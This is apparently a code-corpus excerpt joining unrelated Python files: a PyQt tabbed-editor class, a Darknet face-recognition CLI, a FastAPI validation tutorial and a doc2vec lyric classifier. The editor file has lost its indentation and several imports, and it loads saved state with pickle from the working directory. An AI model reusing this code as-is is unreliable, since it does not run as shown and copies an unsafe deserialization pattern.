from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QTabWidget
from pymarkview.resources.defaults import welcome_text
from pymarkview.util import resource_path
from pathlib import Path
class TabbedEditor(QTabWidget):
text_changed = pyqtSignal()
tab_changed = pyqtSignal()
tab_title_changed = pyqtSignal(str)
file_saved = pyqtSignal(str)
STATE_FILE = ".saved_state"
DEFAULT_TAB_NAME = "untitled"
def __init__(self, parent, editor_widget, settings, *args):
super().__init__(*args)
self.__set_style()
self._parent = parent
self._editor_widget = editor_widget
self._settings = settings
self._editor_state = {}
self._tab_state = {}
self._mapping = self.TabIndexMapping()
self.__load_state()
self.tabCloseRequested.connect(self.close_tab)
self.currentChanged.connect(self.__tab_changed)
@property
def current_editor(self):
return self._editor_state.get(self._mapping.get_uid(self.currentIndex()))
@property
def current_tab_state(self):
return self._tab_state.get(self._mapping.get_uid(self.currentIndex()))
def __get_tab_state(self, tab_index=None):
if tab_index is not None:
return self._tab_state.get(self._mapping.get_uid(tab_index))
else:
return self._tab_state.get(self._mapping.get_uid(self.currentIndex()))
def __get_editor_state(self, tab_index):
if tab_index is not None:
return self._editor_state.get(self._mapping.get_uid(tab_index))
else:
return self._editor_state.get(self._mapping.get_uid(self.currentIndex()))
def __new_state(self, tab_index, editor_obj):
uid = self._mapping.add(tab_index)
self._tab_state.update({uid: {
"modified": False,
"path": None,
"text": ""
}})
self._editor_state.update({uid: editor_obj})
def __update_tab_state(self, attrib_dict, tab_index=None):
if tab_index is None:
tab_index = self.currentIndex()
uid = self._mapping.get_uid(tab_index)
if self._tab_state.get(uid):
update_tab_title = False
for attrib, value in attrib_dict.items():
self._tab_state.get(uid)[attrib] = value
if attrib in ("path", "modified"):
update_tab_title = True
if update_tab_title:
self.__update_tab_title()
def __get_path(self, tab_index=None):
state = self.__get_tab_state(tab_index)
return state["path"]
def __get_filename(self, tab_index=None):
path = self.__get_path(tab_index)
if path:
return str(Path(path).name)
else:
return self.DEFAULT_TAB_NAME
def get_filename(self):
return self.tabText(self.currentIndex())
def new_tab(self, append=False):
new_ln_editor = self._editor_widget(self._settings)
if append:
tab_index = self.addTab(new_ln_editor, self.DEFAULT_TAB_NAME)
else:
tab_index = self.insertTab(self.currentIndex() + 1, new_ln_editor, self.DEFAULT_TAB_NAME)
self.__new_state(tab_index, new_ln_editor.editor)
if len(self._editor_state) == 1:
self.__connect_tab_signals(tab_index)
else:
self.setCurrentIndex(tab_index)
return tab_index
def close_tab(self, tab_index):
state = self.__get_tab_state(tab_index)
if state["modified"]:
res = self.__show_save_dialog()
if res == QMessageBox.Yes:
if not self.save_file():
return False
elif res == QMessageBox.Cancel:
return False
if len(self._editor_state) == 1:
self.new_tab()
self.removeTab(tab_index)
uid = self._mapping.remove(tab_index)
self._tab_state.pop(uid)
self._editor_state.pop(uid)
self.tab_changed.emit()
def set_text(self, text, tab_index=None):
editor = self.__get_editor_state(tab_index)
if editor:
editor.setPlainText(text)
def get_text(self, tab_index=None):
editor = self.__get_editor_state(tab_index)
if editor:
return editor.toPlainText()
def open_file(self, path, pmv_file=False):
if path:
return self.__open_file_helper(path, pmv_file)
else:
filename, _ = QFileDialog.getOpenFileName(self._parent,
"Open Markdown text file", "", "Text Files (*.txt;*.md);;All Files (*)")
if filename:
return self.__open_file_helper(filename)
else:
return False
def __open_file_helper(self, path, pmv_file=False):
assert path, "No file name provided!"
if pmv_file:
curr_path = self.__get_path()
if not curr_path: # temporary, unsaved tabs
return False
path = str(Path(self.__get_path()).parent.joinpath(path))
for uid, attrib_dict in self._tab_state.items():
if attrib_dict["path"]:
if Path(attrib_dict["path"]) == Path(path):
self.setCurrentIndex(self._mapping.get_index(uid))
return False
if Path(path).exists():
with io.open(path, "r", encoding="utf-8", errors="replace") as f:
data = f.read()
tab_index = self.new_tab(append=True)
self.set_text(data, tab_index)
self.__update_tab_state({"path": path, "modified": False})
return True
else:
return False
def save_file(self):
state = self.current_tab_state
path = state["path"]
if path:
with io.open(path, "w", encoding="utf-8") as f:
f.write(self.get_text())
self.file_saved.emit(path)
self.__update_tab_state({"modified": False})
return True
else:
return self.save_as_file()
def save_as_file(self):
path, sel_filter = QFileDialog.getSaveFileName(self._parent, "Save as...", "", "Markdown File (*.md);;Text File (*.txt)")
if path:
with io.open(path, "w", encoding="utf-8") as f:
f.write(self.get_text())
self.file_saved.emit(path)
self.__update_tab_state({"path": path, "modified": False})
return True
return False
def load_instructions(self):
tab_index = self.new_tab()
self.set_text(welcome_text, tab_index)
self.__update_tab_state({"modified": False}, tab_index)
def __handle_text_change(self):
self.__update_tab_state({"modified": True})
self.text_changed.emit()
def __connect_tab_signals(self, tab_index):
self.__get_editor_state(tab_index).textChanged.connect(self.__handle_text_change)
self.__get_editor_state(tab_index).document_dropped.connect(self.open_file)
def __tab_changed(self, tab_index):
self.__connect_tab_signals(tab_index)
self.tab_changed.emit()
def __load_state(self):
if Path(self.STATE_FILE).exists():
with io.open(self.STATE_FILE, "rb") as f:
state = pickle.load(f)
self._mapping.import_mapping(state["mapping"])
for uid in self._mapping.mapping:
new_ln_editor = self._editor_widget(self._settings)
tab_index = self.addTab(new_ln_editor, self.DEFAULT_TAB_NAME)
self._editor_state.update({uid: new_ln_editor.editor})
self.__connect_tab_signals(tab_index)
self._tab_state = state["tab_state"]
for uid, tab_state in self._tab_state.copy().items():
tab_index = self._mapping.get_index(uid)
self.setCurrentIndex(tab_index)
if tab_state["modified"]:
self.set_text(tab_state["text"], tab_index)
self._tab_state[uid]["modified"] = True
else:
path = tab_state["path"]
if path:
if Path(path).exists():
with io.open(path, "r", encoding="utf-8") as f:
data = f.read()
self.set_text(data, tab_index)
self._tab_state[uid]["modified"] = False
else:
self.set_text(tab_state["text"], tab_index)
self._tab_state[uid]["modified"] = True
else:
self.set_text(tab_state["text"], tab_index)
self._tab_state[uid]["modified"] = False
self.__update_tab_title(self._mapping.get_index(uid))
self.setCurrentIndex(state["active_tab"])
current_editor = self.current_editor
current_editor.moveCursor(QTextCursor.End)
cursor = QTextCursor(current_editor.document().findBlockByLineNumber(state["active_line"]))
current_editor.setTextCursor(cursor)
else:
self.load_instructions()
def save_state(self):
for tab_index in range(self.count()):
self.__update_tab_state({"text": self.get_text(tab_index)}, tab_index)
state = {
"active_tab": self.currentIndex(),
"active_line": self.current_editor.textCursor().blockNumber(),
"mapping": self._mapping.export_mapping(),
"tab_state": self._tab_state
}
with io.open(self.STATE_FILE, "wb") as f:
pickle.dump(state, f)
def __update_tab_title(self, tab_index=None):
if tab_index is None:
tab_index = self.currentIndex()
state = self.__get_tab_state(tab_index)
title = ""
title += self.__get_filename(tab_index)
title += " •" if state["modified"] else ""
self.setTabText(tab_index, title)
self.tab_title_changed.emit(title)
def __show_save_dialog(self):
msg = QMessageBox()
# msg.setWindowIcon(self.app_icon)
msg.setIcon(QMessageBox.Warning)
msg.setWindowTitle("Save Changes?")
msg.setText("{file} has been modified. Save changes?".format(file=self.__get_filename()))
msg.addButton(QMessageBox.Yes)
msg.addButton(QMessageBox.No)
msg.addButton(QMessageBox.Cancel)
return msg.exec()
def __set_style(self):
self.setTabsClosable(True)
self.setStyleSheet('''
QTabBar::close-button {
image: url(''' + resource_path("pymarkview/resources/close.png") + ''');
}
QTabBar::close-button:hover {
image: url(''' + resource_path("pymarkview/resources/close-hover.png") + ''');
}
''')
class TabIndexMapping:
def __init__(self):
self._mapping = []
self._mapping_uid = 1000
def add(self, index=None):
uid = self._mapping_uid
if index is not None:
self._mapping.insert(index, uid)
else:
self._mapping.append(uid)
self._mapping_uid += 1
return uid
def remove(self, index):
return self._mapping.pop(index)
def get_uid(self, index):
return self._mapping[index]
def get_index(self, uid):
return self._mapping.index(uid)
@property
def mapping(self):
return self._mapping
def export_mapping(self):
return {"__mapping": self._mapping, "__mapping_uid": self._mapping_uid}
def import_mapping(self, mapping_dict):
self._mapping = mapping_dict["__mapping"]
self._mapping_uid = mapping_dict["__mapping_uid"]
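# Small sketch of the uid <-> tab-index bookkeeping handled by TabIndexMapping:
#   m = TabbedEditor.TabIndexMapping()
#   uid = m.add()        # -> 1000, appended at index 0
#   m.get_index(uid)     # -> 0
#   m.get_uid(0)         # -> 1000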
``` |
{
"source": "0-jam/face_detector",
"score": 3
} |
#### File: 0-jam/face_detector/cli_dark_face_recognizer.py
```python
import argparse
import json
from pathlib import Path
import time
import cv2
from modules.dark_recognizer import recognize_face
def main():
parser = argparse.ArgumentParser(description='Recognize objects using pre-trained Darknet model')
parser.add_argument('input', type=str, help='Input file')
parser.add_argument('--output', '-o', type=str, help='Output file (default: none)')
args = parser.parse_args()
img = cv2.imread(str(Path(args.input)))
start_time = time.time()
faces = recognize_face(img)
elapsed_time = time.time() - start_time
print('Found objects: {}, Elapsed time: {:.2f} sec'.format(len(faces), elapsed_time))
print(faces)
out_path = args.output
if out_path is not None:
with Path(out_path).open('w') as out_json:
out_json.write(json.dumps(faces, ensure_ascii=False))
if __name__ == "__main__":
main()
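# Example invocation (paths are illustrative):
#   python cli_dark_face_recognizer.py photo.jpg -o detections.json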
``` |
{
"source": "0-jam/fastapi_tutorials",
"score": 3
} |
#### File: 0-jam/fastapi_tutorials/items.py
```python
from typing import Optional
from fastapi import FastAPI, Path, Query
app = FastAPI()
# Recieve the parameter 'q' with the default value (None) and the limit of characters (5)
@app.get('/items/')
async def read_items(
q: Optional[str] = Query(
None,
min_length=3,
max_length=5,
# Custom metadata
# 'description' can be shown in the document
title='Query String',
description='Query string for the items',
alias='item-query',
)
):
results = {'items': [
{'item_id': 'Foo'},
{'item_id': 'Bar'},
]}
if q:
results.update({'q': q})
return results
# Recieve the parameter 'q' which accepts only the fixed value ('fixedquery') using reqular expressions
# This query is marked as deprecated (can be shown on documents)
@app.get('/items_fixed/')
async def read_items_fixed(q: Optional[str] = Query(None, min_length=3, max_length=50, regex='^fixedquery$', deprecated=True)):
results = {'items': [
{'item_id': 'Foo'},
{'item_id': 'Bar'},
]}
if q:
results.update({'q': q})
return results
# Recieve the parameter 'q' which accepts only the fixed value ('fixedquery') using reqular expressions
@app.get('/items_required/')
async def read_items_required(q: str = Query(..., min_length=3, max_length=5)):
results = {'items': [
{'item_id': 'Foo'},
{'item_id': 'Bar'},
]}
if q:
results.update({'q': q})
return results
@app.get('/items/{item_id}')
async def read_item(
# Pass parameters as keyword arguments
# All parameters are required
# gt: greater than
# lt: less than
# ge: greater than or equal
# le: less than or equal
*,
item_id: int = Path(
...,
title='The ID of the item to get',
ge=1,
lt=100,
),
q: str,
size: float = Query(..., gt=0, le=10.5),
):
results = {'item_id': item_id, 'size': size}
if q:
results.update({'q': q})
return results
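# Hedged request sketch (assuming a local dev server, e.g. uvicorn on port 8000):
#   GET /items/5?q=hello&size=2.5
#   -> {"item_id": 5, "size": 2.5, "q": "hello"}
#   item_id outside [1, 100), a missing q, or size outside (0, 10.5] yields a 422 validation error.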
``` |
{
"source": "0-jam/markovify_my_tweets",
"score": 3
} |
#### File: 0-jam/markovify_my_tweets/classify_lyric.py
```python
import argparse
import json
import multiprocessing as mp
import re
import unicodedata
from pathlib import Path
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from modules.transform_text import deconjugate_sentence, remove_stopwords
# from modules.transform_text import extract_nouns, remove_stopwords
NUM_CPU = mp.cpu_count()
D2V_EPOCHS = 100
# 引数sentenceを整形
def replace_sentence(sentence):
# unicode正規化
sentence = unicodedata.normalize('NFKC', sentence)
# 不要な記号を削除
sentence = re.sub(r'\W', '', sentence)
return sentence
# Preprocess the text for Doc2Vec
def preprocess_text(text):
normalized_text = replace_sentence(text.strip())
divided_text = deconjugate_sentence(normalized_text)
# divided_text = extract_nouns(normalized_text)
return remove_stopwords(divided_text)
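# Rough pipeline sketch: normalize (NFKC) -> strip non-word symbols -> split into base-form
# tokens -> drop stopwords, yielding a token list for TaggedDocument. The exact tokens depend
# on deconjugate_sentence/remove_stopwords in modules.transform_text, which are not shown here.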
def main():
parser = argparse.ArgumentParser(description='Classify sentence with doc2vec')
# Required arguments
parser.add_argument('input', type=str, help='Input JSON file path generated from utanet_scraper.py')
parser.add_argument('generated_file', type=str, help='Generated lyrics from rnn_sentence.py')
parser.add_argument('--d2vmodel', type=str, help='Doc2vec model path')
args = parser.parse_args()
if args.d2vmodel:
print('Loading doc2vec model...')
d2vmodel = Doc2Vec.load(args.d2vmodel)
else:
input_path = Path(args.input)
with input_path.open(encoding='utf-8') as json_data:
dataset = json.load(json_data).values()
# Attribute as data or labels
data_attr = 'lyric'
label_attrs = ['artist']
print('Generating doc2vec model...')
docs = [TaggedDocument(preprocess_text(data[data_attr]), tags=[unicodedata.normalize('NFKC', data[attr]) for attr in label_attrs]) for data in dataset]
d2vmodel = Doc2Vec(docs, vector_size=256, window=5, min_count=3, epochs=D2V_EPOCHS, workers=NUM_CPU)
d2vmodel.save(input_path.stem + '.model')
with Path(args.generated_file).open() as generated_lyrics:
for i, generated_lyric in enumerate(generated_lyrics):
print('Song', i)
print(d2vmodel.docvecs.most_similar([d2vmodel.infer_vector(preprocess_text(generated_lyric))]))
if __name__ == '__main__':
main()
``` |